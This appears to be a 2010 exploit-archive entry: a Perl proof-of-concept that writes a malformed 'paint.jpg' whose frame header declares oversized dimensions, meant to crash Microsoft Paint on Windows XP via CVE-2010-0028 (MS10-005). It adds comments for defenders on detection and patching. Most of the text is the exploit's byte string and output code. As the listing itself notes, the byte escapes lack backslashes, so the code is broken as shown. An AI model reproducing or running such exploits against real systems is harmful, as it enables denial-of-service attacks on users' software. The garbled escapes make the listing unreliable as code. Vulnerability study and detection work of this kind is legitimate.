mspaint-dos.txt
Posted on 07 May 2010
# Exploit Title: Microsoft Paint Integer Overflow Vulnerability (DoS) MS10-005
# Date: 2010-05-04
# Author: unsign
# Software Link:
# Version: 5.1.2600.2180
# Tested on: Windows XP SP2
# CVE : CVE-2010-0028
# Code :
#!/usr/bin/perl
#
# Proof-of-concept file generator for CVE-2010-0028 (MS10-005).  The script
# does one thing: it writes the fixed string $PoC to "paint.jpg" in the
# current working directory.  Nothing is computed at runtime; there are no
# arguments, no input, and no network activity.
#
# Defender notes:
#   * The field that matters is the SOF0 frame header (the chunk annotated
#     "Image Size" below): height and width are both 0x93CE = 37838, while
#     the whole file is only a few hundred bytes of scan data.  A JPEG whose
#     frame header declares dimensions wildly out of proportion to the file
#     size is a cheap, low-false-positive signal for an upload filter or a
#     detection rule; the product-side fix is the MS10-005 update.
#   * NOTE(review): every "xNN" chunk below is written without a backslash,
#     so as this listing stands the chunks are plain ASCII text rather than
#     byte escapes.  This looks like a transcription artifact of the listing
#     and is left exactly as found.
#   * No 'use strict' / 'use warnings'; $PoC is a package global.  The
#     filehandle at the bottom is a bareword and neither open() nor close()
#     is checked, so a failed write goes unreported.
#
$PoC = "xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x01x01x00x60".   # SOI, APP0 ("JFIF")
       "x00x60x00x00xFFxE1x00x16x45x78x69x66x00x00x49x49".   # APP1 ("Exif")
       "x2Ax00x08x00x00x00x00x00x00x00x00x00xFFxDBx00x43".   # DQT (first table)
       "x00x08x06x06x07x06x05x08x07x07x07x09x09x08x0Ax0C".
       "x14x0Dx0Cx0Bx0Bx0Cx19x12x13x0Fx14x1Dx1Ax1Fx1Ex1D".
       "x1Ax1Cx1Cx20x24x2Ex27x20x22x2Cx23x1Cx1Cx28x37x29".
       "x2Cx30x31x34x34x34x1Fx27x39x3Dx38x32x3Cx2Ex33x34".
       "x32xFFxDBx00x43x01x09x09x09x0Cx0Bx0Cx18x0Dx0Dx18".   # DQT (second table)
       "x32x21x1Cx21x32x32x32x32x32x32x32x32x32x32x32x32".
       "x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32".
       "x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32".
       "x32x32x32x32x32x32xFFxC0x00x11x08".                  # SOF0: length 0x11, 8-bit precision
       "x93xCEx93xCE".   # Image Size 37838x37838 (0x93CE x 0x93CE) -- the integer overflow trigger
       "x03".            # three components
       "x01x22x00x02x11x01x03x11x01xFFxC4x00x1Fx00x00x01".   # component specs, then DHT
       "x05x01x01x01x01x01x01x00x00x00x00x00x00x00x00x01".
       "x02x03x04x05x06x07x08x09x0Ax0BxFFxC4x00xB5x10x00".
       "x02x01x03x03x02x04x03x05x05x04x04x00x00x01x7Dx01".
       "x02x03x00x04x11x05x12x21x31x41x06x13x51x61x07x22".
       "x71x14x32x81x91xA1x08x23x42xB1xC1x15x52xD1xF0x24".
       "x33x62x72x82x09x0Ax16x17x18x19x1Ax25x26x27x28x29".
       "x2Ax34x35x36x37x38x39x3Ax43x44x45x46x47x48x49x4A".
       "x53x54x55x56x57x58x59x5Ax63x64x65x66x67x68x69x6A".
       "x73x74x75x76x77x78x79x7Ax83x84x85x86x87x88x89x8A".
       "x92x93x94x95x96x97x98x99x9AxA2xA3xA4xA5xA6xA7xA8".
       "xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2xC3xC4xC5xC6".
       "xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE1xE2xE3".
       "xE4xE5xE6xE7xE8xE9xEAxF1xF2xF3xF4xF5xF6xF7xF8xF9".
       "xFAxFFxC4x00x1Fx01x00x03x01x01x01x01x01x01x01x01".   # further DHT tables
       "x01x00x00x00x00x00x00x01x02x03x04x05x06x07x08x09".
       "x0Ax0BxFFxC4x00xB5x11x00x02x01x02x04x04x03x04x07".
       "x05x04x04x00x01x02x77x00x01x02x03x11x04x05x21x31".
       "x06x12x41x51x07x61x71x13x22x32x81x08x14x42x91xA1".
       "xB1xC1x09x23x33x52xF0x15x62x72xD1x0Ax16x24x34xE1".
       "x25xF1x17x18x19x1Ax26x27x28x29x2Ax35x36x37x38x39".
       "x3Ax43x44x45x46x47x48x49x4Ax53x54x55x56x57x58x59".
       "x5Ax63x64x65x66x67x68x69x6Ax73x74x75x76x77x78x79".
       "x7Ax82x83x84x85x86x87x88x89x8Ax92x93x94x95x96x97".
       "x98x99x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5".
       "xB6xB7xB8xB9xBAxC2xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3".
       "xD4xD5xD6xD7xD8xD9xDAxE2xE3xE4xE5xE6xE7xE8xE9xEA".
       "xF2xF3xF4xF5xF6xF7xF8xF9xFAxFFxDAx00x0Cx03x01x00".   # SOS header
       "x02x11x03x11x00x3Fx00xF7xFAx28xA2x80x0Ax28xA2x80".   # minimal scan data
       "x0Ax28xA2x80x0Ax28xA2x80x3FxFFxD9";                  # ... then EOI
# Output: bareword filehandle, 3-arg open to a fixed relative path; the
# return values of open(), print and close() are all ignored.
open(file , ">", "paint.jpg");
print file $PoC;
close(file);